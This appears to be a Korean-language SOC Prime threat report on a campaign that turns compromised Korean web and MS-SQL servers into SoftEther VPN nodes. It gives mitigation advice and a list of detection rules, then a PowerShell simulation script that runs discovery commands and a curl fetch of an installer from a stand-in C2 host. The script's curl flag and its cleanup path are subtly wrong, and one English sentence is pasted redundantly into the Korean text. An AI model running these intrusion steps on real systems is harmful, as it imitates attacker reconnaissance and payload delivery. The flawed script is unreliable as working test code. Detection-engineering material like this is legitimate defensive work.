SOC Prime Bias: High

20 Aug 2026 07:34 UTC

악성코드 캠페인, SoftEther VPN을 실행하는 한국 웹 서버 겨냥

Author Photo
SOC Prime Team linkedin icon 팔로우
악성코드 캠페인, SoftEther VPN을 실행하는 한국 웹 서버 겨냥
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

요약

Larva-26010 위협 행위자는 한국 내 웹 및 MS-SQL 서버를 대상으로 SoftEther VPN을 배포하고 있습니다. 침해된 시스템은 VPN 서버로 재사용되며, 경우에 따라 공격자의 실제 C&C 인프라를 숨기기 위해 캐스케이드 연결이 사용될 수 있습니다. 침입은 일반적으로 웹 서버 침해부터 시작하여 웹 셸과 SQLShell의 배포로 이어집니다.

조사

안랩 보안 인텔리전스 센터는 2026년 4월부터 8월 사이에 발생한 최근 공격 활동을 확인했습니다. 조사를 통해 공격 순서가 변경된 것을 확인했으며, 웹 서버가 먼저 침해되고, 탐색 명령어, SoftEther VPN 설치, MS-SQL 서버를 대상으로 한 후속 공격으로 이어져 CLR SqlShell을 배포하는 순서로 진행되었습니다. 공격자는 또한 PowerShell, bitsadmin, 및 certutil 과 같은 도구를 페이로드 전송에 사용했습니다.

완화

관리자는 웹 서버의 취약점을 점검하고, DBMS 쿼리 및 웹 서비스 요청에 사용되는 모든 입력 값을 검증해야 합니다. 업로드 디렉터리 전체에 실행 권한을 제한하고, IIS 웹 서버와 운영 체제를 최신 패치 상태로 유지해야 합니다. V3와 같은 안티바이러스 및 보안 제품도 최신 버전으로 업데이트해야 합니다.

대응

악성 활동이 발견되면 영향을 받은 웹과 MS-SQL 서버를 즉시 격리하여 측면 이동을 제한해야 합니다. 조사자는 웹 셸과 SqlShell 배포 범위를 결정하고 새로 생성된 사용자 계정을 검토하여 승인되지 않은 관리자 계정을 확인해야 합니다. UseLogonCredential과 같은 레지스트리 설정도 의심스러운 수정이 있는지 확인해야 합니다. UseLogonCredential should also be examined for suspicious modifications.

공격 흐름

탐지

Certutil의 데이터 인코딩 및 인증서 작업 사용 (명령어를 통해)

SOC 안랩 팀
2026년 8월 19일

PowerShell을 통한 다운로드 또는 업로드 (명령어를 통해)

SOC 안랩 팀
2026년 8월 19일

시스템 나열 가능성 (명령어를 통해)

SOC 안랩 팀
2026년 8월 18일

시스템 네트워크 구성 발견 가능성 (명령어를 통해)

SOC 안랩 팀
2026년 8월 18일

짧은 스크립트 이름 사용에 의한 실행 가능성 (명령어를 통해)

SOC 안랩 팀
2026년 8월 18일

의심스러운 CURL 사용 (명령어를 통해)

SOC 안랩 팀
2026년 8월 18일

직접 IP를 통한 의심스러운 파일 다운로드 (프록시를 통해)

SOC 안랩 팀
2026년 8월 18일

대한민국에서 SoftEther VPN이 실행중인 국내 웹 서버에 대한 악성 소프트웨어 공격 사례를 탐지하기 위한 IOCs (HashMd5)

SOC 안랩 AI 룰
2026년 8월 18일

대한민국에서 SoftEther VPN이 실행중인 국내 웹 서버에 대한 악성 소프트웨어 공격 사례를 탐지하기 위한 IOCs (SourceIP)

SOC 안랩 AI 룰
2026년 8월 18일

대한민국에서 SoftEther VPN이 실행중인 국내 웹 서버에 대한 악성 소프트웨어 공격 사례를 탐지하기 위한 IOCs (DestinationIP)

SOC 안랩 AI 룰
2026년 8월 18일

AWS CloudFront 잠재적인 DoS 공격 탐지됨 [AWS Cloudtrail]

SOC 안랩 AI 룰
2026년 8월 18일

PowerShell 다운로드 및 사용자 계정 생성으로 인한 권한 상승 [Windows Powershell]

SOC 안랩 AI 룰
2026년 8월 18일

Microsoft Windows 탐색 및 SoftEther VPN 설치 [웹서버]

SOC 안랩 AI 룰
2026년 8월 18일

## 시뮬레이션 실행

필수 조건: 텔레메트리 및 기반선 출발 전 체크가 통과되어야 합니다.

이유: 이 섹션은 탐지 규칙을 유발하도록 설계된 적수 기술 (TTP)의 정확한 실행을 설명합니다. 명령어와 설명은 반드시 식별된 TTP를 직접 반영하며 탐지 논리에 의해 기대되는 정확한 데이터를 생성하려고 합니다. 추상적이거나 관련 없는 예는 오진으로 이어질 것입니다.

  • 공격 내러티브 및 명령어: 적수는 웹 취약성을 통해 초기 접근을 얻었습니다. 측면 이동을 촉진하고 지속적인 백도어를 설정하기 위해, 그들은 로컬 네트워크를 매핑하고 SoftEther VPN 설치 프로그램을 다운로드해야 합니다. 공격자는 ipconfig /all 을 실행하여 인터페이스를 매핑하고, whoami 를 사용하여 권한을 확인하고, curl 을 사용하여 원격 명령과 제어 (C2) 서버에서 설치 프로그램을 가져옵니다. 이 특정 시퀀스는 Sigma 규칙에 정의된 정확한 명령줄 문자열과 일치하여 “SoftEther VPN 설치” 탐지 논리를 트리거하도록 설계되었습니다.

  • 회귀 테스트 스크립트:

    # 시뮬레이션 스크립트: SoftEther 탐지 및 페이로드 다운로드
    # 이 스크립트는 탐지 규칙이 찾고 있는 정확한 명령어를 실행합니다.
    
    Write-Host "[+] 탐지 단계 시작..." -ForegroundColor Cyan
    
    # 선택 명령 라인 트리거: 'whoami'
    whoami
    
    # 선택 명령 라인 트리거: 'ipconfig /all'
    ipconfig /all
    
    # 선택 명령 라인 트리거: 'netstat -ano -p tcp'
    netstat -ano -p tcp
    
    # 선택 명령 라인 트리거: 'systeminfo'
    systeminfo
    
    Write-Host "[+] 페이로드 다운로드 단계 시작..." -ForegroundColor Cyan
    
    # 선택 이미지 트리거: 'curl.exe' AND 선택 명령 라인: 'curl -h'
    # 우리는 다운로드 의도를 모방하면서 규칙의 논리 내에서 -h를 사용합니다
    curl -h https://example.com/softether_installer.exe
    
    Write-Host "[+] 시뮬레이션 완료." -ForegroundColor Green
  • 정리 명령어:

    # 이 시뮬레이션에서는 실제로 파일을 다운로드하지 않았으나,
    # 아티팩트가 남지 않도록 합니다.
    Remove-Item -Path "$env:TEMP*" -Force -ErrorAction SilentlyContinue